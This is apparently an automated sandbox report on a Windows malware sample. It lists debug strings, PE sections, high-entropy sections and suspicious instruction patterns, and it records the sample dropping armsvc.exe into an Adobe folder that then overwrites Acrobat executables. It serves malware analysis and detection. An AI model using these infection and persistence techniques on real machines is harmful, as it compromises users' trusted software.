Source:	Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.1713083112.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
Source:	Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\ocpubmgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OcPubMgr.exe.2.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: SABXJ1B5c8.exe, 00000000.00000003.1597532692.0000000004150000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: SABXJ1B5c8.exe, 00000000.00000003.1566835146.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: SABXJ1B5c8.exe, 00000000.00000003.1609720901.00000000040D0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.1664251039.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.1823253916.0000000001AD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
Source:	Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.1672501273.00000000020A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: updater.pdb source: armsvc.exe, 00000002.00000003.2547468354.00000000007B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2125086655.0000000001AC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2080574432.0000000002080000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2285445121.0000000000A40000.00000004.00001000.00020000.00000000.sdmp

Source: msiexec.exe.0.dr

Static PE information: 0x88D88F1C [Thu Oct 2 20:16:28 2042 UTC]

Source: elevation_service.exe.0.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.0.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.0.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.0.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.0.dr	Static PE information: section name: malloc_h
Source: maintenanceservice.exe.0.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.0.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.0.dr	Static PE information: section name: _RDATA
Source: msdtc.exe.0.dr	Static PE information: section name: .didat
Source: msiexec.exe.0.dr	Static PE information: section name: .didat
Source: MsSense.exe.0.dr	Static PE information: section name: .didat
Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.0.dr	Static PE information: section name: .didat
Source: elevation_service.exe0.0.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.0.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.0.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.0.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.0.dr	Static PE information: section name: malloc_h
Source: Spectrum.exe.0.dr	Static PE information: section name: .didat
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .00cfg
Source: maintenanceservice.exe.2.dr	Static PE information: section name: .voltbl
Source: maintenanceservice.exe.2.dr	Static PE information: section name: _RDATA
Source: minidump-analyzer.exe.2.dr	Static PE information: section name: .00cfg
Source: minidump-analyzer.exe.2.dr	Static PE information: section name: .voltbl
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.2.dr	Static PE information: section name: .gehcont
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.2.dr	Static PE information: section name: .gehcont
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: section name: .retplne
Source: pingsender.exe.2.dr	Static PE information: section name: .00cfg
Source: pingsender.exe.2.dr	Static PE information: section name: .voltbl
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: section name: .00cfg
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: section name: .retplne
Source: plugin-container.exe.2.dr	Static PE information: section name: .00cfg
Source: plugin-container.exe.2.dr	Static PE information: section name: .voltbl
Source: private_browsing.exe.2.dr	Static PE information: section name: .00cfg
Source: private_browsing.exe.2.dr	Static PE information: section name: .voltbl
Source: updater.exe.2.dr	Static PE information: section name: .00cfg
Source: updater.exe.2.dr	Static PE information: section name: .voltbl
Source: updater.exe.2.dr	Static PE information: section name: _RDATA
Source: TieringEngineService.exe.2.dr	Static PE information: section name: .didat
Source: vds.exe.2.dr	Static PE information: section name: .didat
Source: VSSVC.exe.2.dr	Static PE information: section name: .didat
Source: unpack200.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .00cfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .gxfg
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: .retplne
Source: ie_to_edge_stub.exe.2.dr	Static PE information: section name: _RDATA
Source: WmiApSrv.exe.2.dr	Static PE information: section name: .didat
Source: wmpnetwk.exe.2.dr	Static PE information: section name: .didat
Source: SearchIndexer.exe.2.dr	Static PE information: section name: .didat
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .00cfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .gxfg
Source: cookie_exporter.exe.2.dr	Static PE information: section name: .retplne
Source: cookie_exporter.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: identity_helper.exe.2.dr	Static PE information: section name: .retplne
Source: identity_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: identity_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: setup.exe.2.dr	Static PE information: section name: .00cfg
Source: setup.exe.2.dr	Static PE information: section name: .gxfg
Source: setup.exe.2.dr	Static PE information: section name: .retplne
Source: setup.exe.2.dr	Static PE information: section name: LZMADEC
Source: setup.exe.2.dr	Static PE information: section name: _RDATA
Source: setup.exe.2.dr	Static PE information: section name: malloc_h
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .00cfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .gxfg
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .retplne
Source: msedgewebview2.exe.2.dr	Static PE information: section name: CPADinfo
Source: msedgewebview2.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedgewebview2.exe.2.dr	Static PE information: section name: _RDATA
Source: msedgewebview2.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .00cfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .gxfg
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .retplne
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: LZMADEC
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: _RDATA
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: malloc_h
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .00cfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .gxfg
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .retplne
Source: notification_click_helper.exe.2.dr	Static PE information: section name: CPADinfo
Source: notification_click_helper.exe.2.dr	Static PE information: section name: _RDATA
Source: notification_click_helper.exe.2.dr	Static PE information: section name: malloc_h
Source: pwahelper.exe.2.dr	Static PE information: section name: .00cfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .gxfg
Source: pwahelper.exe.2.dr	Static PE information: section name: .retplne
Source: pwahelper.exe.2.dr	Static PE information: section name: _RDATA
Source: pwahelper.exe.2.dr	Static PE information: section name: malloc_h
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .00cfg
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .gxfg
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .retplne
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: _RDATA
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: malloc_h

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_022340BD push rbp; iretd	2_3_022340BE
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02007DD2 push rsp; ret	2_3_02007DD9
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02007DD2 push rsp; ret	2_3_02007DD9
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02007DD2 push rsp; ret	2_3_02007DD9
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Code function: 2_3_02007DD2 push rsp; ret	2_3_02007DD9
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00BA68CE push E9000001h; retn 0000h	7_2_00BA68D3
Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00BA52E3 push E9000001h; retf 0000h	7_2_00BA52E8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009968CE push E9000001h; retn 0000h	10_2_009968D3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Code function: 10_2_009952E3 push E9000001h; retf 0000h	10_2_009952E8
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD68CE push E9000001h; retn 0000h	11_2_00CD68D3
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD52E3 push E9000001h; retf 0000h	11_2_00CD52E8
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 13_2_00BC68CE push E9000001h; retn 0000h	13_2_00BC68D3
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Code function: 13_2_00BC52E3 push E9000001h; retf 0000h	13_2_00BC52E8
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_008558F1 push 00855856h; ret	14_2_00855908
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00855917 push 00855856h; ret	14_2_00855908
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00855D22h; ret	14_2_00855CB0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00855C60h; ret	14_2_00855D09
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00855FAEh; ret	14_2_00855F1A
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00855EE7h; ret	14_2_00855F39
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 008562B2h; ret	14_2_0085604C
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 0085631Bh; ret	14_2_0085639A
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 008563FFh; ret	14_2_0085642E
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856C2Dh; ret	14_2_00856C55
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856D50h; ret	14_2_00856CA5
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856FD5h; ret	14_2_00856D31
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856FDFh; ret	14_2_00856DE5
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856D86h; ret	14_2_00856E6E
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856EFDh; ret	14_2_00856E8A
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00857342h; ret	14_2_00856EAE
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 008571D0h; ret	14_2_00856EE0
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 14_2_00858140 push 00856F98h; ret	14_2_00856F15

Source: SABXJ1B5c8.exe	Static PE information: section name: .reloc entropy: 7.9204863406628485
Source: elevation_service.exe.0.dr	Static PE information: section name: .reloc entropy: 7.933968207053835
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.92358666456881
Source: FXSSVC.exe.0.dr	Static PE information: section name: .reloc entropy: 7.930092063873972
Source: elevation_service.exe0.0.dr	Static PE information: section name: .reloc entropy: 7.931735605522291
Source: SensorDataService.exe.0.dr	Static PE information: section name: .reloc entropy: 7.922535252886395
Source: Spectrum.exe.0.dr	Static PE information: section name: .reloc entropy: 7.933307692898294
Source: minidump-analyzer.exe.2.dr	Static PE information: section name: .reloc entropy: 7.92235452649725
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9221238618110705
Source: 117.0.5938.149_117.0.5938.132_chrome_updater.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.922123475619713
Source: Aut2exe.exe.2.dr	Static PE information: section name: .rsrc entropy: 7.796128458164721
Source: Aut2exe_x64.exe.2.dr	Static PE information: section name: .rsrc entropy: 7.796259909897694
Source: AgentService.exe.2.dr	Static PE information: section name: .reloc entropy: 7.924371300342963
Source: vds.exe.2.dr	Static PE information: section name: .reloc entropy: 7.928791299191825
Source: VSSVC.exe.2.dr	Static PE information: section name: .reloc entropy: 7.9271401836974515
Source: wbengine.exe.2.dr	Static PE information: section name: .reloc entropy: 7.929014929044329
Source: wmpnetwk.exe.2.dr	Static PE information: section name: .reloc entropy: 7.934820515835558
Source: SearchIndexer.exe.2.dr	Static PE information: section name: .reloc entropy: 7.93377743033685
Source: 7zFM.exe.2.dr	Static PE information: section name: .reloc entropy: 7.919199831626081
Source: 7zG.exe.2.dr	Static PE information: section name: .reloc entropy: 7.914533529797201
Source: identity_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.928240694154064
Source: setup.exe.2.dr	Static PE information: section name: .reloc entropy: 7.932280192979255
Source: msedgewebview2.exe.2.dr	Static PE information: section name: .reloc entropy: 7.923544381512515
Source: msedge_proxy.exe.2.dr	Static PE information: section name: .reloc entropy: 7.929864411593221
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: section name: .reloc entropy: 7.934252114293858
Source: notification_click_helper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.931770901824541
Source: pwahelper.exe.2.dr	Static PE information: section name: .reloc entropy: 7.928400747025173
Source: msedge_proxy.exe0.2.dr	Static PE information: section name: .reloc entropy: 7.929856092043988

Persistence and Installation Behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\SABXJ1B5c8.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
